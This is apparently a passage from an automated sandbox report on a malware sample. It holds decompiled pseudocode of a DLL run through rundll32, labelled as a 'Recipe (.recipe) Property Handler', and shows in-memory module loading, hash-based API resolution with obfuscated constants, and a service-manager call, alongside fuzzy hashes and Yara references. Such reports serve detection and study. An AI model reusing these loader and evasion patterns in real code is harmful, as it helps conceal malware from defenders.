								_t70 = E10001DD0( *_t14, 4 +  *_t11 * 4);
								_t84 = _t85 + 8;
								if(_t70 == 0) {
									_t40 = _t78 + 0x28; // 0x12f7805
									_t41 = _t78 + 0x24; // 0x39c033cc
									 *((intOrPtr*)( *_t41))(_t80,  *_t40);
									SetLastError(0xe);
									return 0;
								} else {
									_t15 = _t78 + 0xc; // 0xd0ff0000
									 *((intOrPtr*)(_t78 + 8)) = _t70;
									_t77 = _t80;
									 *((intOrPtr*)(_t70 +  *_t15 * 4)) = _t77;
									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
									_t71 =  *_t67;
									if(_t71 == 0) {
										_t82 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
										_t72 = _t82;
									} else {
										_t64 = _a4;
										_t82 = _t71 + _t64;
										_t72 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
									}
									_t56 =  *_t82;
									if(_t56 == 0) {
										L17:
										_t67 = _t67 + 0x14;
										_v12 = _t67;
										if(IsBadReadPtr(_t67, 0x14) != 0) {
											goto L22;
										} else {
											_t79 = _a4;
											continue;
										}
									} else {
										_t73 = _t72 - _t82;
										_v16 = _t73;
										while(1) {
											_t27 = _t78 + 0x28; // 0x12f7805
											_push( *_t27);
											_t68 = _t73 + _t82;
											if(_t56 >= 0) {
												_t58 = _t56 + _a4 + 2;
											} else {
												_t58 = _t56 & 0x0000ffff;
											}
											_t30 = _t78 + 0x20; // 0xccccc35d
											_t60 =  *((intOrPtr*)( *_t30))(_t77, _t58);
											_t84 = _t84 + 0xc;
											 *_t68 = _t60;
											if(_t60 == 0) {
												break;
											}
											_t56 = _t82[2];
											_t73 = _v16;
											_t77 = _v8;
											_t82 =  &(_t82[2]);
											if(_t56 != 0) {
												continue;
											} else {
												_t67 = _v12;
												goto L17;
											}
											goto L23;
										}
										_t37 = _t78 + 0x28; // 0x12f7805
										_t39 = _t78 + 0x24; // 0x39c033cc
										 *((intOrPtr*)( *_t39))(_v8,  *_t37);
										SetLastError(0x7f);
										return 0;
									}
								}
							}
							goto L23;
						}
					}
					goto L22;
				}
				L23:
			}

























                                          0x10001479
                                          0x1000147c
                                          0x1000147e
                                          0x1000147e
                                          0x10001488
                                          0x1000148b
                                          0x100015db
                                          0x100015e4
                                          0x10001491
                                          0x10001497
                                          0x1000149c
                                          0x100014a7
                                          0x100014b0
                                          0x100014b0
                                          0x100014b5
                                          0x00000000
                                          0x00000000
                                          0x100014bb
                                          0x100014c1
                                          0x100014c6
                                          0x100014c8
                                          0x100014cb
                                          0x100014d0
                                          0x100015c8
                                          0x100015d6
                                          0x100014d6
                                          0x100014d6
                                          0x100014e1
                                          0x100014e9
                                          0x100014eb
                                          0x100014f0
                                          0x100015a7
                                          0x100015aa
                                          0x100015ae
                                          0x100015b5
                                          0x100015c3
                                          0x100014f6
                                          0x100014f6
                                          0x100014f9
                                          0x100014fc
                                          0x100014fe
                                          0x10001501
                                          0x10001504
                                          0x10001508
                                          0x1000151a
                                          0x1000151d
                                          0x1000150a
                                          0x1000150a
                                          0x1000150d
                                          0x10001513
                                          0x10001513
                                          0x1000151f
                                          0x10001523
                                          0x1000156a
                                          0x1000156a
                                          0x10001570
                                          0x1000157b
                                          0x00000000
                                          0x1000157d
                                          0x1000157d
                                          0x00000000
                                          0x1000157d
                                          0x10001525
                                          0x10001525
                                          0x10001527
                                          0x10001530
                                          0x10001530
                                          0x10001530
                                          0x10001533
                                          0x10001538
                                          0x10001545
                                          0x1000153a
                                          0x1000153a
                                          0x1000153a
                                          0x10001548
                                          0x1000154c
                                          0x1000154e
                                          0x10001551
                                          0x10001555
                                          0x00000000
                                          0x00000000
                                          0x10001557
                                          0x1000155a
                                          0x1000155d
                                          0x10001560
                                          0x10001565
                                          0x00000000
                                          0x10001567
                                          0x10001567
                                          0x00000000
                                          0x10001567
                                          0x00000000
                                          0x10001565
                                          0x10001585
                                          0x1000158b
                                          0x1000158f
                                          0x10001596
                                          0x100015a4
                                          0x100015a4
                                          0x10001523
                                          0x100014f0
                                          0x00000000
                                          0x100014d0
                                          0x100014b0
                                          0x00000000
                                          0x100014a7
                                          0x00000000

                                          APIs
                                          • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,100013CB), ref: 1000149F
                                          • SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100015C8
                                            • Part of subcall function 10001DD0: VirtualQuery.KERNEL32(0637E8EF,?,0000001C,100013CB,00000000,?,?,?,?,?,100014E9,0637E8EF,D0FF0000), ref: 10001DEA
                                          • IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80), ref: 10001573
                                          • SetLastError.KERNEL32(0000007F), ref: 10001596
                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB), ref: 100015B5
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast$Read$QueryVirtual
                                          • String ID:
                                          • API String ID: 4108280708-0
                                          • Opcode ID: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                          • Instruction ID: a489c81f2b48b45f7abe8d82c2fa530717afe034d23ef7191f16fae001b152d3
                                          • Opcode Fuzzy Hash: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                          • Instruction Fuzzy Hash: 02415E71600619EBEB10CF59DC80B99B7A8FF483A5F04416AED0ADB705D731E961CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000A35A, Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E1000A35A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000476A( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000A179( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E10005EC6();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                          0x1000a362
                                          0x1000a367
                                          0x1000a381
                                          0x00000000
                                          0x1000a381
                                          0x1000a369
                                          0x1000a36e
                                          0x00000000
                                          0x00000000
                                          0x1000a373
                                          0x1000a38e
                                          0x1000a393
                                          0x1000a396
                                          0x1000a39d
                                          0x1000a3bc
                                          0x1000a3c3
                                          0x1000a3c5
                                          0x1000a409
                                          0x1000a411
                                          0x1000a420
                                          0x1000a426
                                          0x1000a428
                                          0x1000a438
                                          0x1000a438
                                          0x1000a43c
                                          0x1000a43e
                                          0x1000a441
                                          0x1000a441
                                          0x1000a441
                                          0x1000a441
                                          0x00000000
                                          0x1000a447
                                          0x1000a42a
                                          0x1000a42a
                                          0x1000a42f
                                          0x1000a42f
                                          0x1000a432
                                          0x00000000
                                          0x1000a432
                                          0x1000a3c7
                                          0x1000a3ca
                                          0x1000a3ce
                                          0x1000a3f7
                                          0x1000a3f7
                                          0x1000a3fa
                                          0x1000a3fa
                                          0x00000000
                                          0x00000000
                                          0x1000a3fc
                                          0x1000a400
                                          0x00000000
                                          0x00000000
                                          0x1000a402
                                          0x1000a402
                                          0x00000000
                                          0x1000a402
                                          0x1000a3d0
                                          0x1000a3d3
                                          0x00000000
                                          0x00000000
                                          0x1000a3d7
                                          0x1000a3ea
                                          0x1000a3f0
                                          0x1000a3f3
                                          0x1000a3f5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x1000a3f5
                                          0x1000a39f
                                          0x1000a3a2
                                          0x1000a3a4
                                          0x1000a3a9
                                          0x1000a3a9
                                          0x1000a3ae
                                          0x00000000
                                          0x1000a3ae
                                          0x1000a375
                                          0x1000a37a
                                          0x1000a37e
                                          0x1000a37e
                                          0x00000000

                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A38E
                                          • __isleadbyte_l.LIBCMT ref: 1000A3BC
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A3EA
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A420
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                          • Instruction ID: 9d1cf0849eee1a075b18554553a91368e22c05569ceb8c6a927f46b954fbfb1a
                                          • Opcode Fuzzy Hash: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                          • Instruction Fuzzy Hash: 6231B035A00256AFEB11CF65C848BAE7BE5FF822D0F124628F850871A4E770E9D1DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10006610, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 20%
                                          			E10006610(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E10006C38(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E100042B0(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E10006E99(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E10006402(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E10004280(_t25, _t29);
					return _t25;
				}
				return _t25;
			}











                                          0x10006610
                                          0x10006610
                                          0x10006613
                                          0x10006618
                                          0x1000661b
                                          0x1000661d
                                          0x10006620
                                          0x10006623
                                          0x10006624
                                          0x10006627
                                          0x1000662c
                                          0x1000662c
                                          0x1000662f
                                          0x10006633
                                          0x10006636
                                          0x1000663b
                                          0x10006638
                                          0x10006638
                                          0x10006638
                                          0x1000663e
                                          0x10006643
                                          0x10006644
                                          0x10006647
                                          0x10006649
                                          0x1000664c
                                          0x1000664f
                                          0x10006650
                                          0x10006658
                                          0x1000665d
                                          0x10006661
                                          0x10006667
                                          0x1000666a
                                          0x1000666d
                                          0x10006670
                                          0x10006671
                                          0x10006674
                                          0x1000667f
                                          0x10006683
                                          0x00000000
                                          0x10006683
                                          0x1000668a

                                          APIs
                                          • ___BuildCatchObject.LIBCMT ref: 10006627
                                            • Part of subcall function 10006C38: ___AdjustPointer.LIBCMT ref: 10006C81
                                          • _UnwindNestedFrames.LIBCMT ref: 1000663E
                                          • ___FrameUnwindToState.LIBCMT ref: 10006650
                                          • CallCatchBlock.LIBCMT ref: 10006674
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                          • String ID:
                                          • API String ID: 2633735394-0
                                          • Opcode ID: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                          • Instruction ID: 929118807ddd2d015550d77d84a67e82c7ccc00f3a1cd5c495e14181e13c7b39
                                          • Opcode Fuzzy Hash: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                          • Instruction Fuzzy Hash: D6014C72000109BBEF02CF55DC01EDA3BBAFF5C790F228119F91862124C732E961DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10003850, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E10003850(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t35 = _t23 -  *0x10012158; // 0x8bc2c1c1
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0x10013090 = _t9;
				 *0x1001308c = _t23;
				 *0x10013088 = _t26;
				 *0x10013084 = _t22;
				 *0x10013080 = _t28;
				 *0x1001307c = _t27;
				 *0x100130a8 = ss;
				 *0x1001309c = cs;
				 *0x10013078 = ds;
				 *0x10013074 = es;
				 *0x10013070 = fs;
				 *0x1001306c = gs;
				asm("pushfd");
				_pop( *0x100130a0);
				 *0x10013094 =  *_t30;
				 *0x10013098 = _v0;
				 *0x100130a4 =  &_a4;
				 *0x10012fe0 = 0x10001;
				_t14 =  *0x10013098; // 0x0
				 *0x10012f9c = _t14;
				 *0x10012f90 = 0xc0000409;
				 *0x10012f94 = 1;
				 *0x10012fa0 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0x10012fa4 + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0x10012158; // 0x8bc2c1c1
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0x1001215c; // 0x743d3e3e
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E10004B24(_t19 << 0, 0x1000e478);
			}




















                                          0x10003850
                                          0x10003850
                                          0x10003850
                                          0x10003850
                                          0x10003850
                                          0x10003850
                                          0x10003856
                                          0x10003858
                                          0x10003858
                                          0x10004b62
                                          0x10004b6c
                                          0x10004b73
                                          0x10004b77
                                          0x10004b78
                                          0x10004b78
                                          0x10004b7a
                                          0x10004b7f
                                          0x10004b85
                                          0x10004b8b
                                          0x10004b91
                                          0x10004b97
                                          0x10004b9d
                                          0x10004ba4
                                          0x10004bab
                                          0x10004bb2
                                          0x10004bb9
                                          0x10004bc0
                                          0x10004bc7
                                          0x10004bc8
                                          0x10004bd1
                                          0x10004bd9
                                          0x10004be1
                                          0x10004bec
                                          0x10004bf6
                                          0x10004bfb
                                          0x10004c00
                                          0x10004c0a
                                          0x10004c14
                                          0x10004c20
                                          0x10004c24
                                          0x10004c30
                                          0x10004c34
                                          0x10004c3a
                                          0x10004c40
                                          0x10004c44
                                          0x10004c4a
                                          0x10004c59

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32 ref: 10004B6C
                                          • ___raise_securityfailure.LIBCMT ref: 10004C53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                          • String ID: >>=tT
                                          • API String ID: 3761405300-2312331387
                                          • Opcode ID: 1c23e9b23445cc868b92f1be3282b246f2d7a56e7b7291d55cb854e56c3593aa
                                          • Instruction ID: 5596601be5ca5cb93711aa550495a421ea5fee831cd5595aa2954f187b284eac
                                          • Opcode Fuzzy Hash: 1c23e9b23445cc868b92f1be3282b246f2d7a56e7b7291d55cb854e56c3593aa
                                          • Instruction Fuzzy Hash: 1A21B3B4500224EEFB06CF24E9E6B447BE4FB4C354F11C16EEA089B3A5D7B0D5958B04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100032A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100032CF
                                          • GetModuleFileNameW.KERNEL32(10000000,?,00000104,?,10002572,1000D260,80000002,8BC2C1C1), ref: 100032E3
                                          Strings
                                          • Recipe (.recipe) Property Handler, xrefs: 100032A6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileFromModuleNameString
                                          • String ID: Recipe (.recipe) Property Handler
                                          • API String ID: 1402647516-129706424
                                          • Opcode ID: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                          • Instruction ID: 6f8015bcf9db97dc62130dd9dbc2d8b03967e6a2f427fd85d2ca8f80d55362ab
                                          • Opcode Fuzzy Hash: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                          • Instruction Fuzzy Hash: 7AF01231510718AFD310DFA8C844E96B7E8EF09754F00851BF689D7610E7B0A544CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001980, Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E10001980(void* _a4) {
				void* _t15;
				void* _t16;
				void* _t20;
				intOrPtr _t23;
				void* _t30;
				signed int _t32;
				void* _t34;
				void* _t35;

				_t34 = _a4;
				if(_t34 == 0) {
					return _t15;
				}
				if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
					_t30 =  *(_t34 + 4);
					 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
				}
				if( *(_t34 + 8) == 0) {
					L10:
					_t16 =  *(_t34 + 4);
					if(_t16 != 0) {
						VirtualFree(_t16, 0, 0x8000);
					}
					return HeapFree(GetProcessHeap(), 0, _t34);
				} else {
					_t32 = 0;
					if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
						L8:
						_t20 =  *(_t34 + 8);
						if(_t20 != 0) {
							VirtualFree(_t20, 0, 0x8000);
						}
						goto L10;
					} else {
						goto L5;
					}
					do {
						L5:
						_t23 =  *((intOrPtr*)( *(_t34 + 8) + _t32 * 4));
						if(_t23 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x24))))(_t23,  *((intOrPtr*)(_t34 + 0x28)));
							_t35 = _t35 + 8;
						}
						_t32 = _t32 + 1;
					} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
					goto L8;
				}
			}











                                          0x10001984
                                          0x10001989
                                          0x10001a09
                                          0x10001a09
                                          0x1000198f
                                          0x10001993
                                          0x100019a0
                                          0x100019a0
                                          0x100019a6
                                          0x100019e2
                                          0x100019e2
                                          0x100019e7
                                          0x100019f1
                                          0x100019f1
                                          0x00000000
                                          0x100019a8
                                          0x100019a9
                                          0x100019ae
                                          0x100019cc
                                          0x100019cc
                                          0x100019d2
                                          0x100019dc
                                          0x100019dc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x100019b0
                                          0x100019b0
                                          0x100019b3
                                          0x100019b8
                                          0x100019c1
                                          0x100019c3
                                          0x100019c3
                                          0x100019c6
                                          0x100019c7
                                          0x00000000
                                          0x100019b0

                                          APIs
                                          • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019DC
                                          • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019F1
                                          • GetProcessHeap.KERNEL32(00000000,EC8B55CC,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100019FA
                                          • HeapFree.KERNEL32(00000000,?,10001DC4), ref: 10001A01
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Free$HeapVirtual$Process
                                          • String ID:
                                          • API String ID: 3505259878-0
                                          • Opcode ID: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                          • Instruction ID: 46a294df184e67868fe018602a73977999fd3160e39f49d8b46b80fbf7fdd7f8
                                          • Opcode Fuzzy Hash: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                          • Instruction Fuzzy Hash: 1E115A31600711ABE620DBA5CC89F9673E8EB48BD1F108818F59AD7294CB70F841CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: rundll32.exe PID: 2808 Parent PID: 2892 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 00222959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00222959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0022602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x0022295f
                                          0x00222964
                                          0x00222967
                                          0x0022296a
                                          0x0022296d
                                          0x0022296e
                                          0x0022296f
                                          0x00222977
                                          0x00222985
                                          0x0022298a
                                          0x00222992
                                          0x0022299a
                                          0x002229a2
                                          0x002229a9
                                          0x002229b0
                                          0x002229b7
                                          0x002229bb
                                          0x002229cf
                                          0x002229dc
                                          0x002229e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002229DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 37b4d298cd155c94a1be96190f1608c22ec2d5d7dc8241c68084df23160ea007
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E5016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0022C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0022602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x0022c6e1
                                          0x0022c6e6
                                          0x0022c6f0
                                          0x0022c6fc
                                          0x0022c703
                                          0x0022c706
                                          0x0022c70d
                                          0x0022c711
                                          0x0022c715
                                          0x0022c71c
                                          0x0022c723
                                          0x0022c72a
                                          0x0022c731
